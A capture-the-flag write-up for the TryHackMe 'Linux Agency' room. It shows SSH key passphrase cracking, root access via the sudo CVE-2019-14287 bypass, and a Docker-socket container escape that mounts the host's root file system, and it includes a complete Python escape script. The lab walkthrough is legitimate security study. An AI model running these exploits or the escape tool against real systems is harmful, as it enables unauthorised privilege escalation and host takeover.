TryHackMe: Linux Agency https://tryhackme.com/room/linuxagency

PrivEsc Pathway

The PrivEsc throughout the missions, and even between the named users, was pretty straightforward. I will be skipping it in this post (let me know if you want any hints) and will concentrate on the user and root flags.

PrivEsc Pointers

Check out GTFOBins (for sudo/SUID binaries that can spawn a shell or read files) and Python library hijacking (a script run with elevated privileges that imports a module from a directory you can write to).

User Flag

To get the user flag you first need to crack the passphrase on robert's SSH private key at /home/maya/old_robert_ssh: convert the key to a hash with ssh2john, then run john against that hash with a wordlist.

Once you have the passphrase you need to find the SSH server that is listening on localhost only (the container listing further down shows it published on 127.0.0.1:2222). Connect to it as robert with the key, entering the passphrase you cracked above.

Once you have logged in you will notice there is no user.txt in robert's home; you need to PrivEsc to read /root/user.txt, which can be done with CVE-2019-14287. That bug affects sudo before 1.8.28 when a sudoers rule lets you run a command as any user except root, i.e. a runas list of the form (ALL, !root): the numeric uid -1 (or 4294967295) given via -u# is not caught by the !root exclusion, but is converted to uid 0 when the command runs, so the shell comes up as root. Check sudo -l and sudo -V first to confirm the rule and the version.

robert@ec96850005d6:~$ sudo -u#-1 /bin/bash
root@ec96850005d6:~# cat /root/user.txt
user{[redacted]}
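As an added check (my example, not code from the original post): given the text of sudo -l and sudo -V, decide whether a box is a CVE-2019-14287 candidate. The two sample outputs are constructed for the example; the rule text for robert on the real box may differ.

```python
"""Added example: flag a CVE-2019-14287 candidate from `sudo -l` / `sudo -V` text.

The sample outputs below are constructed, not captured from the room.
"""
import re

# sudo 1.8.28 fixed CVE-2019-14287: "-u#-1" / "-u#4294967295" no longer maps to uid 0.
FIXED_VERSION = (1, 8, 28)

# Constructed sample output of `sudo -V` and `sudo -l` on a vulnerable host.
SAMPLE_SUDO_V = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SAMPLE_SUDO_L = """Matching Defaults entries for robert on ec96850005d6:
    env_reset, mail_badpass

User robert may run the following commands on ec96850005d6:
    (ALL, !root) NOPASSWD: /bin/bash
    (www-data) /usr/bin/tail
"""


def parse_sudo_version(sudo_v_output):
    """Return (major, minor, patch) from the first line of `sudo -V`, e.g. 'Sudo version 1.8.21p2'."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError("could not find a sudo version string")
    return tuple(int(x) for x in m.groups())


def exploitable_rules(sudo_l_output):
    """Return the rule lines whose runas user list is ALL minus some named users, e.g. '(ALL, !root)'.

    Only those rules let `sudo -u#-1 <cmd>` slip past the exclusion on a vulnerable sudo.
    A runas spec may carry a group part after ':' (e.g. '(ALL, !root : ALL)'); only the
    user part matters here, and '(ALL, !ALL)' excludes everyone, so it is skipped.
    """
    rules = []
    for line in sudo_l_output.splitlines():
        line = line.strip()
        m = re.match(r"\((?P<runas>[^)]*)\)\s*(?P<spec>.*)", line)
        if not m:
            continue
        users = [u.strip() for u in m.group("runas").split(":")[0].split(",")]
        if "ALL" in users and "!ALL" not in users and any(u.startswith("!") for u in users):
            rules.append(line)
    return rules


def is_cve_2019_14287_candidate(sudo_v_output, sudo_l_output):
    """True when the version predates the fix AND at least one '(ALL, !...)' rule exists."""
    return parse_sudo_version(sudo_v_output) < FIXED_VERSION and bool(exploitable_rules(sudo_l_output))


if __name__ == "__main__":
    for rule in exploitable_rules(SAMPLE_SUDO_L):
        print("candidate rule:", rule)
    if is_cve_2019_14287_candidate(SAMPLE_SUDO_V, SAMPLE_SUDO_L):
        print("vulnerable sudo version; try: sudo -u#-1 /bin/bash")
```

On a real target feed it the actual command output (for example via subprocess) rather than the constructed samples; the version check is the important half, since the rule shape alone is harmless on a patched sudo.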

Root Flag

To get root I had to use some Google-fu and ended up at Escaping the Whale: Things you probably shouldn't do with Docker (Part 1) (archive.org linked), which shows how to abuse the Docker API from inside a container when the daemon's socket is reachable.

socat

This escape needs socat, which is not installed in the container, so copy a binary in (ideally a statically linked one, so it does not depend on libraries the container lacks) with scp, wget or your preferred method and make it executable with chmod +x socat.

Escape

First we need to list the running containers. The Docker socket is reachable from inside because, as the Mounts entry in the output shows, the host's /var/run is bind-mounted into the container:

root@ec96850005d6:~# curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json
{"Id":"ec96850005d6cf609fadbeaef4a7dbdcad5108f5c319c2f69bc9badf9bc2fbdb","Names":["/kronstadt_industries"],"Image":"mangoman","ImageID":"sha256:b5f279024ce056b3d8da10dfec1d39e39db92900eae68cf941911449e29023f8","Command":"/usr/sbin/sshd -D","Created":1610455843,"Ports":[{"IP":"127.0.0.1","PrivatePort":22,"PublicPort":2222,"Type":"tcp"}],"Labels":{},"State":"running","Status":"Up About an hour","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"bc6fc17c075ad6a5bae0a7a178fb6a0ab5b2820d452f9ab532df008d25cfe69a","EndpointID":"da0e7f20c37a5077ac437f4af97b0b33b5665e25bd4d3ec36f1dabc9418b58b0","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run","Destination":"/var/run","Mode":"","RW":true,"Propagation":"rprivate"}]}]

Make a note of the "Image" value (mangoman). We then write a container.json describing the container we want to create:

echo -e '{"Image":"mangoman","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/mnt/root"}]}' > container.json

Take note of

  • "Image":"mangoman" - the image that already exists on the host, as found above. Most write-ups use ubuntu, which is not available on this host; /containers/create does not pull images, so an unknown image just fails with "No such image".
  • "Type":"bind","Source":"/","Target":"/mnt/root" - a bind mount of the host's / into the new container at /mnt/root, which is how we get read/write access to the host's root file system.

Now let's create the new container with curl against the Docker API:

root@ec96850005d6:~# curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d "$(cat container.json)" http://localhost/containers/create
{"Id":"2353dc60ab495411bb1203ade7a9a94b5428d568179b4b00661d29c932d43e9c","Warnings":[]}

Make a note of the "Id" value, as we need it in the following commands. Now start the container through the API:

curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/YOUR-CONTAINER-ID/start

Once started, use socat to open a raw connection to the API socket:

root@ec96850005d6:~# ./socat - UNIX-CONNECT:/var/run/docker.sock

Once connected socat will appear to hang; it is simply waiting for input. Paste the following request to attach to the container and have its stdin and stdout streamed over the socket:

POST /containers/YOUR-CONTAINER-ID/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

After pasting that and pressing Enter twice (the blank line terminates the request headers) we should get:

HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp
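The same sequence (list containers, create, start, attach with the HTTP upgrade) as one script, added here as my own example rather than code from the post or the linked article. It drives the engine API from Python over the Unix socket instead of curl and socat. Assumptions: the socket is /var/run/docker.sock, the image of the first running container is reused, and the host's / is bind-mounted at /mnt/root; the mounts are placed under HostConfig, the documented location, rather than the flat "Mounts" key used in container.json above. Only run it against systems you are authorised to test.

```python
"""Added example: the Docker-socket escape driven from Python over the Unix socket.

Not code from the original post. Assumed: socket path, reuse of the first running
container's image, and the /mnt/root mount point. Pure helpers are kept separate
so the request/response handling can be exercised without a daemon.
"""
import http.client
import json
import select
import socket
import struct
import sys

SOCKET_PATH = "/var/run/docker.sock"   # reachable here because /var/run is bind-mounted from the host


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client speaking HTTP/1.1 over a Unix domain socket instead of TCP."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def api(conn, method, path, body=None):
    """One JSON request/response against the engine API; raises on 4xx/5xx."""
    headers = {"Content-Type": "application/json"} if body is not None else {}
    conn.request(method, path, body=None if body is None else json.dumps(body), headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    if resp.status >= 400:
        raise RuntimeError(f"{method} {path} -> {resp.status}: {data!r}")
    return json.loads(data) if data else None


def container_spec(image, host_root="/mnt/root"):
    """Body for POST /containers/create: an idle /bin/sh with the host's / bind-mounted (assumed layout)."""
    return {"Image": image, "Cmd": ["/bin/sh"], "OpenStdin": True, "Tty": False,
            "HostConfig": {"Binds": [f"/:{host_root}"]}}


def attach_request(container_id):
    """The raw HTTP/1.1 upgrade request fed to socat above, as bytes."""
    return (f"POST /containers/{container_id}/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1\r\n"
            "Host: localhost\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n\r\n").encode()


def parse_upgrade_response(data):
    """Return (status_code, bytes that followed the headers); raise unless the daemon answered 101."""
    head, sep, rest = data.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP response header")
    status_line = head.split(b"\r\n", 1)[0]
    code = int(status_line.split()[1])
    if code != 101:
        raise RuntimeError(f"attach refused: {status_line.decode(errors='replace')}")
    return code, rest


def demux(stream):
    """Split a non-TTY attach stream into (fd, payload) frames and return any trailing partial frame.

    Each frame is an 8-byte header (stream type: 1=stdout, 2=stderr; three zero
    bytes; big-endian payload length) followed by the payload.
    """
    frames, pos = [], 0
    while len(stream) - pos >= 8:
        fd, size = struct.unpack(">B3xI", stream[pos:pos + 8])
        if len(stream) - pos - 8 < size:
            break
        frames.append((fd, stream[pos + 8:pos + 8 + size]))
        pos += 8 + size
    return frames, stream[pos:]


def escape(sock_path=SOCKET_PATH, host_root="/mnt/root"):
    conn = UnixHTTPConnection(sock_path)
    image = api(conn, "GET", "/containers/json")[0]["Image"]            # an image the host already has
    cid = api(conn, "POST", "/containers/create", container_spec(image, host_root))["Id"]
    api(conn, "POST", f"/containers/{cid}/start")                         # 204, empty body
    conn.close()
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)                 # fresh socket for the upgrade
    s.connect(sock_path)
    s.sendall(attach_request(cid))
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = s.recv(4096)
        if not chunk:
            raise RuntimeError("daemon closed the socket before answering")
        buf += chunk
    _, pending = parse_upgrade_response(buf)
    print(f"[+] attached to {cid[:12]}; host root is under {host_root}", file=sys.stderr)
    while True:   # shuttle bytes: our stdin -> container stdin (unframed); container output -> our stdout
        ready, _, _ = select.select([s, sys.stdin], [], [])
        if s in ready:
            chunk = s.recv(4096)
            if not chunk:
                break
            frames, pending = demux(pending + chunk)
            for _, payload in frames:
                sys.stdout.buffer.write(payload)
            sys.stdout.flush()
        if sys.stdin in ready:
            line = sys.stdin.buffer.readline()
            if not line:
                break
            s.sendall(line)


if __name__ == "__main__":
    escape()
```

Because the container is created without a TTY, the output side of the attach stream is frame-multiplexed; the demux() step strips those 8-byte headers, which are the unprintable bytes you would otherwise see interleaved in the socat session. Remove the helper container afterwards.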

If all went as planned we now have a shell streamed through the API and can read the flag. Note: this is a limited shell with no TTY, so interactive commands and pagers (less, more) will likely not work. The container we created keeps running on the host until it is stopped and removed, so clean it up afterwards.

cd mnt/root/root

ls
    message.txt
    root.txt

cat root.txt
    root{[redacted]}

cat message.txt
    Nice Job 47
    We are really impressed with your skills

    Hope you enjoyed your journey!!

    Your director's of ICA 
    0z09e & Xyan1d3


    ========>0z09e
    https://github.com/0z09e
    https://twitter.com/0z09e

    ========>Xyan1d3
    https://twitter.com/xyan1d3
    https://github.com/xyan1d3